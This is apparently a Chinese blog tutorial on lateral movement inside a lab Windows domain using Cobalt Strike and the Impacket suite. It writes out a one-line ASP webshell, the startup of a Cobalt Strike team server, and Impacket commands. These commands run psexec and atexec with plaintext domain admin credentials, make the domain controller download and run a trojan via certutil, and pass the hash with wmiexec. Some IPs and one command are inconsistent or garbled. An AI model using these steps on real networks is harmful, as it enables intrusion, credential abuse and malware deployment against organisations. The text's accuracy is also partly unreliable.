【网安-Web渗透测试-内网渗透】内网横向移动——Impacket套件

目录

一、概念

  1. 横向移动

    指攻击者从已控制主机,跳转迁移到内网其他主机的攻击行为。攻入内网后,以沦陷主机为跳板,探测内网存活资产、锁定目标,依托内网代理和窃取的账号凭据,通过各类远程控制技术渗透拿下更多设备,最终窃取机密数据、掌控内网关键资产。

  2. 网络结构解读

    Web 服务器是唯一外网出口,仅它可访问外网;内网其他主机仅能域内互通、无法联网,且所有域内主机均由域控 DC 统一管理。

  3. 渗透目标

    已通过 Web 渗透拿下 Webserver 权限,以此机为唯一跳板进行内网横向移动,最终获取域控权限。

  4. 演示约束

    所有工具上传、脚本运行仅在 Webserver 上操作,不触碰其他内网主机。

二、环境说明

注意:①主机的开启顺序一定为DC、WebServer、FileServer或SQL Server、Mary或Jack。②环境在资源"内网环境文件(5台Vmware虚拟机环境)"中获取。

1、DC

名称
操作系统 Windows Server 2008
IP地址 102.168.179.21

2、WebServer

名称
操作系统 Windows Server 2008
IP地址 102.168.179.31

3、SQL Server

名称
操作系统 Windows Server 2012
IP地址 102.168.179.32

4、FileServer

名称
操作系统 Windows Server 2003
IP地址 102.168.179.30

5、Marry

名称
操作系统 Windows 7
IP地址 102.168.179.25

2.6 Jack

名称
操作系统 Windows 8.1
IP地址 102.168.179.29

三、内网横向移动

1、上传木马并在CS中上线

Step1 :在WebServer的IIS中添加1.asp文件,用于后续的WebShell。

新建ASP脚本:

bash 复制代码
# 文件名为1.asp
<% eval request("test") %>

备注:此处默认站点中存在漏洞被攻击者利用并上传了WebShell。

Step2:启动CS的Server端和Client端

Server端(Kali机中运行):

bash 复制代码
$ cd /home/kali/tools/CS4.8   #切换到我们上传的CS4.8⽬录中
$ cd server                   #切换到server⽬录

#赋予服务端运⾏权限
$ chmod +x teamserver
$ chmod +x TeamServerImage
$ sudo ./teamserver 192.168.179.128 test   #启动teamserver(服务端)IP地址为kali的地址,test为连接密码
[sudo] password for kali: 

[*] Generating X509 certificate and keystore (for SSL)
Generating 3,072 bit RSA key pair and self-signed certificate (SHA384withRSA) with a validity of 90 days
        for: CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth

[*] Starting teamserver
[*] Team Server Version: 4.8 (Pwn3rs)
[*] Setting 'https.protocols' system property: SSLv3,SSLv2Hello,TLSv1,TLSv1.1,TLSv1.2,TLSv1.3
[*] Loading keystrokes.
[*] Loaded 0 keystrokes.
[*] Loading screenshots.
[*] Loaded 0 screenshots.
[*] Loading downloads.
[*] Loaded 0 downloads.
[*] Loading Windows error codes.
[*] Windows error codes loaded
[*] Loading hosted files
[*] Loaded 0 servers with hosted items
[*] Loading beacons
[*] Loaded 0 beacons
[+] Team server is up on 0.0.0.0:50050   # 默认端⼝是50050,且无地址限制
[*] SHA256 hash of SSL cert is: 44bc7fd1d9706b82bd047a8d1503d

Client端(Windows端运行):

用户名可任意设置。确认密码、IP和端口无误后单击"Connect"按钮。

Step2 :使用CS生成木马,通过webshell管理工具蚁剑上传到WebServer(网站服务器)运行上线

新增连接配置。名为NAT_1。

将其进行保存并取消x64位的勾选。

将保存好的文件(cs_1.exe)通过蚁剑上传至WebServer。

在中运行了cs_1.exe后,在CS中成功上线了。

Step3:提升权限

2、信息收集

Step1:在WebServer的System会话下,获取Hash和明文密码

3、Impacket套件

impacket是含IP/TCP/ICMP等基础协议及大量Windows通信协议的域渗透工具包;通过开启代理,可在自己的主机中对目标主机实施攻击,无需上传其它exe文件。

Step1:设置代理,能访问内网

Step2:下载Impacket套件,以及安装依赖

Impacket下载地址:链接

bash 复制代码
# 运行在Python3的环境中
# 安装依赖
C:> cd C:\software\impacket-master
C:> python setup.py install

(1)atexec

Step1:执行命令,查看域控主机的系统权限:

bash 复制代码
C:> cd C:\software\impacket-master\examples
C:> python psexec.py god/administrator:Admin12345@192.168.179.21 "whoami"

Step2:执行下载命令将木马下载到本地:(因为目标机器无法联网,只能构造本地下载地址)

bash 复制代码
C:> python atexec.py god/administrator:Admin12345@192.168.179.21 "certutil.exe -urlcache -split -f http://192.168.179.31/5555.exe C:\5555.exe"
  1. atexec.exe
    远程执行命令工具(在 Windows 上跑)
  2. god/administrator:Admin12345
    域管理员账号密码
    域名:god
    账号:administrator
    密码:Admin12345
  3. @192.168.3.21
    目标 = 域控(域控制器)
  4. "certutil.exe ..."
    让域控 执行下载命令
  5. http://192.168.179.31:80/5555.exe
    Web服务器地址,存放木马5555.exe

Step3:执行脚本,成功上线!

bash 复制代码
C:> python atexec.py god/administrator:Admin12345@192.168.179.21 "C:\5555.exe"

Step4:横向到 MARY-PC 主机

如果提示错误,还需设置Session,具体如下图所示:

当上述操作配置好以后,即可成功上线MARY-PC。如下图所示:

因此,拿到DC域控后,可轻易横向移动到其它域成员主机。

(2)wmiexec

Impackt套件无明文密码时利用

bash 复制代码
C:> python wmiexec.py god/Administrator@192.168.179.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

连接成功后得到如下图片的运行效果:

查看IP和用户名:

后续操作可以对域中其它成员进行登录了。后续操作与atexec上传木马并上线,以及横向移动操作类似,无需赘述。

(3)smbexec

bash 复制代码
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7 C:> god/Administrator@192.168.179.21 -codec gbk
相关推荐
日取其半万世不竭8 小时前
云服务器迁移怎么少停机?DNS 切换前后的完整清单
运维·服务器
2601_962364979 小时前
告别明文密码:Windows Hello 抗钓鱼双因子认证安全体系科普
windows
txg6669 小时前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全
问窗10 小时前
Rust实现Windows本地搜索工具
windows·搜索引擎·rust
Roc-xb11 小时前
你似乎已在另一个帐户上设置了 Windows Hello。请将人脸识别从其他帐户删除,然后重试。
windows·人脸识别
法外狂徒111 小时前
将 Pi Agent 接入 HagiCode 的实践之路
服务器·前端·人工智能
Dovis(誓平步青云)11 小时前
《精讲Spring Boot后端跑另一个端口:如何解决暴露服务器问题》
服务器·人工智能·spring boot·后端·生成对抗网络
流量猎手11 小时前
Vscode登陆服务器
服务器·ide·vscode
Chengbei1112 小时前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
HAPPY酷12 小时前
【ROS2】16G 内存笔记本跑 ROS2 仿真?VMware 虚拟机“保姆级”配置指南 (R9 7940HX + RTX 4060)
java·linux·ide·windows·pycharm